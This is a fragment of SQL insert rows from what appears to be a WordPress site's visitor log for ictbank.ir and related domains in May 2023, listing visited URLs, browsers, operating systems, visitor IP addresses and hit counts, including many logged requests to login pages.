(32463,'2023-05-09','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','194.163.162.92','000',0,1,0),
(32464,'2023-05-09','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','62.133.46.8','000',0,1,0),
(32465,'2023-05-09','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','3.6.167.39','000',0,2,0),
(32466,'2023-05-09','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(32467,'2023-05-09','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','134.209.39.24','000',0,2,0),
(32468,'2023-05-09','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','3.135.176.198','000',0,2,0),
(32469,'2023-05-09','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','93.188.2.5','000',0,2,0),
(32470,'2023-05-09','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','206.189.80.189','000',0,2,0),
(32471,'2023-05-09','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','59.25.253.56','000',0,1,0),
(32472,'2023-05-09','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','207.55.248.21','000',0,2,0),
(32473,'2023-05-09','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(32474,'2023-05-09','https://45.92.94.221:443/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','44.211.233.184','000',0,11,0),
(32475,'2023-05-09','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','170.106.153.249','000',0,1,0),
(32476,'2023-05-09','https://45.92.94.221:443/blog','Chrome','Linux','86.0.0','desktop','Unknown','','118.123.105.90','000',0,2,0),
(32477,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(32478,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32479,'2023-05-10','https://ictbank.ir/blog','Chrome','Linux','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(32480,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.48','000',0,3,0),
(32481,'2023-05-10','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(32482,'2023-05-10','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','198.20.69.98','000',0,3,0),
(32483,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','75.119.150.252','000',0,48,0),
(32484,'2023-05-10','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','184.94.240.88','000',0,2,0),
(32485,'2023-05-10','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.190','000',0,2,0),
(32486,'2023-05-10','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.193.1.32','000',0,1,0),
(32487,'2023-05-10','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.154.137.234','000',0,1,0),
(32488,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.188','000',0,1,0),
(32489,'2023-05-10','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(32490,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','185.27.99.123','000',0,1,0),
(32491,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','185.27.99.135','000',0,1,0),
(32492,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','185.27.99.127','000',0,1,0),
(32493,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','185.27.99.137','000',0,1,0),
(32494,'2023-05-10','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.77','000',0,2,0),
(32495,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','79.132.212.174','000',0,37,0),
(32496,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','34.212.70.58','000',0,1,0),
(32497,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','34.223.100.90','000',0,1,0),
(32498,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','35.87.232.60','000',0,1,0),
(32499,'2023-05-10','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','138.197.64.22','000',0,1,0),
(32500,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.236.98.248','000',0,2,0),
(32501,'2023-05-10','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','51.254.213.67','000',0,1,0),
(32502,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','23.226.31.102','000',0,1,0),
(32503,'2023-05-10','https://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.170','000',0,2,0),
(32504,'2023-05-10','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,2,0),
(32505,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','54.202.83.22','000',0,1,0),
(32506,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','77.91.122.218','000',0,2,0),
(32507,'2023-05-10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.250.202.194','000',0,1,0),
(32508,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.187.152.202','000',0,1,0),
(32509,'2023-05-10','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','188.165.223.112','000',0,1,0),
(32510,'2023-05-10','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,3,0),
(32511,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','45.158.49.95','000',0,1,0),
(32512,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','35.92.228.115','000',0,1,0),
(32513,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','112.0.0.0','desktop','Macintosh','','5.238.228.12','000',0,8,0),
(32514,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','113.0.0.0','desktop','Macintosh','','34.209.158.166','000',0,1,0),
(32515,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','90.0.0.0','desktop','Unknown','','198.50.168.204','000',0,1,0),
(32516,'2023-05-10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','132.145.39.16','000',0,7,0),
(32517,'2023-05-10','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','119.28.111.91','000',0,1,0),
(32518,'2023-05-10','http://ictbank.ir/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.46','000',0,1,0),
(32519,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.50','000',0,1,0),
(32520,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.45','000',0,1,0),
(32521,'2023-05-10','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.125.151.118','000',0,1,0),
(32522,'2023-05-10','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','180.163.220.41','000',0,1,0),
(32523,'2023-05-10','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.33','000',0,1,0),
(32524,'2023-05-11','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','128.199.179.16','000',0,1,0),
(32525,'2023-05-11','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(32526,'2023-05-11','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.190.133','000',0,1,0),
(32527,'2023-05-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','80.124.108.33','000',0,1,0),
(32528,'2023-05-11','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','69.166.233.202','000',0,10,0),
(32529,'2023-05-11','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','67.231.26.219','000',0,2,0),
(32530,'2023-05-11','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.166','000',0,1,0),
(32531,'2023-05-11','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.151','000',0,1,0),
(32532,'2023-05-11','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.137','000',0,1,0),
(32533,'2023-05-11','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.135','000',0,1,0),
(32534,'2023-05-11','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(32535,'2023-05-11','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(32536,'2023-05-11','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(32537,'2023-05-11','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.54.114.190','000',0,1,0),
(32539,'2023-05-11','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','54.38.44.6','000',0,4,0),
(32540,'2023-05-11','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.0.232.52','000',0,1,0),
(32541,'2023-05-11','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','65.1.68.254','000',0,2,0),
(32542,'2023-05-11','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.71.236.36','000',0,1,0),
(32543,'2023-05-11','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','54.37.130.109','000',0,2,0),
(32544,'2023-05-11','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','65.175.104.254','000',0,2,0),
(32545,'2023-05-11','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','209.203.48.58','000',0,2,0),
(32546,'2023-05-11','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','13.70.199.249','000',0,2,0),
(32547,'2023-05-11','https://ictbank.ir/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','192.249.120.93','000',0,2,0),
(32548,'2023-05-11','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','119.195.102.159','000',0,1,0),
(32549,'2023-05-11','https://ICTBANK.IR/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','198.71.237.24','000',0,1,0),
(32550,'2023-05-11','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','208.88.6.80','000',0,2,0),
(32551,'2023-05-11','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','45.118.145.152','000',0,2,0),
(32552,'2023-05-11','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','103.82.164.6','000',0,2,0),
(32553,'2023-05-11','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.255.118.204','000',0,1,0),
(32554,'2023-05-11','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','162.255.118.206','000',0,1,0),
(32555,'2023-05-11','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','116.0.23.240','000',0,2,0),
(32556,'2023-05-11','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','103.93.160.210','000',0,2,0),
(32557,'2023-05-11','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','68.183.43.38','000',0,2,0),
(32558,'2023-05-11','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','94.23.208.51','000',0,2,0),
(32559,'2023-05-11','https://ictbank.ir/blog/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','148.72.232.125','000',0,2,0),
(32560,'2023-05-11','https://ICTBANK.IR/BLOG/wp-login.php','Firefox','Windows','111.0','desktop','Unknown','','202.66.172.235','000',0,2,0),
(32561,'2023-05-11','https://ictbank.ir/blog','Chrome','Windows','112.0.0.0','desktop','Unknown','','23.229.104.2','000',0,3,0),
(32562,'2023-05-11','https://ictbank.ir/blog/','Chrome','iOS','113.0.0.0','mobile:smart','iPhone','','2.177.180.75','000',0,1,0),
(32563,'2023-05-11','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.222.50.225','000',0,2,0),
(32564,'2023-05-11','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,1,0),
(32565,'2023-05-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(32566,'2023-05-11','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','125.84.193.67','000',0,1,0),
(32567,'2023-05-11','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','183.66.31.26','000',0,1,0),
(32568,'2023-05-11','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','106.86.113.172','000',0,1,0),
(32569,'2023-05-11','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','221.7.104.131','000',0,1,0),
(32570,'2023-05-11','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','113.205.167.5','000',0,1,0),
(32571,'2023-05-11','https://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','183.64.112.46','000',0,1,0),
(32572,'2023-05-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','3.9.36.245','000',0,1,0),
(32573,'2023-05-11','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,1,0),
(32574,'2023-05-11','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.142','000',0,1,0),
(32575,'2023-05-11','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32576,'2023-05-11','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','20.100.201.114','000',0,8,0),
(32577,'2023-05-11','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(32578,'2023-05-11','https://ictbank.ir/blog','Chrome','OS X','17.0.0.0','desktop','Macintosh','','101.198.0.182','000',0,1,0),
(32579,'2023-05-11','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','38.107.215.29','000',0,2,0),
(32580,'2023-05-11','https://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(32581,'2023-05-11','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','157.245.107.85','000',0,1,0),
(32582,'2023-05-11','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','185.163.109.66','000',0,2,0),
(32583,'2023-05-11','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','103.187.191.203','000',0,1,0),
(32584,'2023-05-11','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.184.199','000',0,1,0),
(32585,'2023-05-11','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','170.106.119.29','000',0,1,0),
(32586,'2023-05-11','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','85.25.93.235','000',0,2,0),
(32587,'2023-05-12','https://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,2,0),
(32588,'2023-05-12','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.118.120','000',0,1,0),
(32589,'2023-05-12','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.127.30','000',0,1,0),
(32590,'2023-05-12','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.51.222','000',0,1,0),
(32591,'2023-05-12','https://nikan-ai.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,2,0),
(32592,'2023-05-12','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,1,0),
(32593,'2023-05-12','https://mail.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,2,0),
(32594,'2023-05-12','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(32595,'2023-05-12','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.44.114','000',0,1,0),
(32596,'2023-05-12','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.77','000',0,1,0),
(32597,'2023-05-12','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32598,'2023-05-12','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.40','000',0,1,0),
(32599,'2023-05-12','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.117','000',0,1,0),
(32600,'2023-05-12','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.126','000',0,4,0),
(32601,'2023-05-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','146.59.69.71','000',0,1,0),
(32602,'2023-05-12','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.170','000',0,1,0),
(32603,'2023-05-12','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(32604,'2023-05-12','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','5.189.170.189','000',0,1,0),
(32605,'2023-05-12','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(32606,'2023-05-12','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.188','000',0,3,0),
(32608,'2023-05-12','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(32609,'2023-05-12','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.135.136.233','000',0,1,0),
(32610,'2023-05-12','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','92.204.139.118','000',0,1,0),
(32611,'2023-05-12','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,4,0),
(32612,'2023-05-12','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','93.95.102.245','000',0,2,0),
(32613,'2023-05-12','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','95.214.26.15','000',0,1,0),
(32614,'2023-05-12','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','170.64.129.164','000',0,6,0),
(32615,'2023-05-12','https://ictbank.ir/blog','Firefox Mobile','Android','81.0','mobile:smart','Unknown','','185.104.29.122','000',0,1,0),
(32616,'2023-05-12','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','173.249.144.196','000',0,1,0),
(32617,'2023-05-12','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.90.21.19','000',0,10,0),
(32618,'2023-05-12','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.194.203','000',0,1,0),
(32619,'2023-05-12','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','38.107.215.29','000',0,2,0),
(32620,'2023-05-12','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.89.22.139','000',0,48,0),
(32621,'2023-05-12','https://www.design-arena.ir/blog','Yandex Browser','Android','23.0.0.0.0','mobile:smart','Reno 5 Lite','','93.159.230.87','000',0,2,0),
(32622,'2023-05-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(32623,'2023-05-12','http://design-arena.ir/','Firefox','Ubuntu','108.0','desktop','Unknown','','147.78.47.230','000',0,10,0),
(32624,'2023-05-12','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.125.112.145','000',0,1,0),
(32625,'2023-05-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','51.83.238.159','000',0,7,0),
(32626,'2023-05-12','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(32627,'2023-05-12','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','75.119.200.14','000',0,1,0),
(32628,'2023-05-12','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(32629,'2023-05-12','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','199.188.204.110','000',0,1,0),
(32630,'2023-05-12','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','51.91.212.100','000',0,1,0),
(32631,'2023-05-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(32632,'2023-05-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(32633,'2023-05-12','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','162.240.211.91','000',0,1,0),
(32634,'2023-05-12','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(32635,'2023-05-12','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','92.204.223.87','000',0,1,0),
(32636,'2023-05-12','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(32637,'2023-05-12','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(32638,'2023-05-13','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(32639,'2023-05-13','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','91.204.46.223','000',0,3,0),
(32640,'2023-05-13','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','5.188.62.21','000',0,1,0),
(32641,'2023-05-13','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,1,0),
(32642,'2023-05-13','https://ictbank.ir/blog','Chrome','Android','113.0.0.0','mobile:smart','Nexus 5X','','66.102.8.239','000',0,1,0),
(32643,'2023-05-13','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(32644,'2023-05-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(32645,'2023-05-13','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(32646,'2023-05-13','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(32647,'2023-05-13','https://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.122','000',0,5,0),
(32648,'2023-05-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(32649,'2023-05-13','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','167.172.244.28','000',0,2,0),
(32650,'2023-05-13','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.145.50.168','000',0,1,0),
(32651,'2023-05-13','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','178.254.29.124','000',0,1,0),
(32652,'2023-05-13','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,1,0),
(32653,'2023-05-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','146.59.52.85','000',0,1,0),
(32654,'2023-05-13','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(32655,'2023-05-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(32656,'2023-05-13','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','131.108.208.161','000',0,1,0),
(32657,'2023-05-13','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.84','000',0,2,0),
(32658,'2023-05-13','https://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.77','000',0,1,0),
(32659,'2023-05-13','https://ictbank.ir/hooman/admin/','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.198.161.53','000',0,18,0),
(32660,'2023-05-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(32661,'2023-05-13','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.151','000',0,1,0),
(32662,'2023-05-13','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.156','000',0,1,0),
(32663,'2023-05-13','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.169','000',0,1,0),
(32664,'2023-05-13','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.164','000',0,1,0),
(32665,'2023-05-13','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(32666,'2023-05-13','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','113.0.0.0','desktop','Unknown','','5.238.39.225','000',0,4,0),
(32667,'2023-05-13','https://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','77.91.122.218','000',0,1,0),
(32668,'2023-05-13','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','163.172.221.217','000',0,1,0),
(32669,'2023-05-13','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.14','000',0,1,0),
(32670,'2023-05-13','https://l.instagram.com/','Instagram','iOS','265.0.0.0.0','mobile:smart','iPhone SE (2nd gen)','','198.50.222.141','000',0,1,0),
(32671,'2023-05-13','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','157.245.107.85','000',0,1,0),
(32672,'2023-05-13','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','67.231.26.219','000',0,1,0),
(32673,'2023-05-13','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(32674,'2023-05-13','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','92.222.70.66','000',0,1,0),
(32675,'2023-05-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','203.161.32.211','000',0,2,0),
(32676,'2023-05-13','https://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.15','000',0,2,0),
(32677,'2023-05-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','146.59.69.71','000',0,1,0),
(32678,'2023-05-13','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','160.153.147.23','000',0,1,0),
(32679,'2023-05-14','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.231.221.207','000',0,1,0),
(32680,'2023-05-14','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.242.26.189','000',0,1,0),
(32681,'2023-05-14','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,6,0),
(32682,'2023-05-14','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
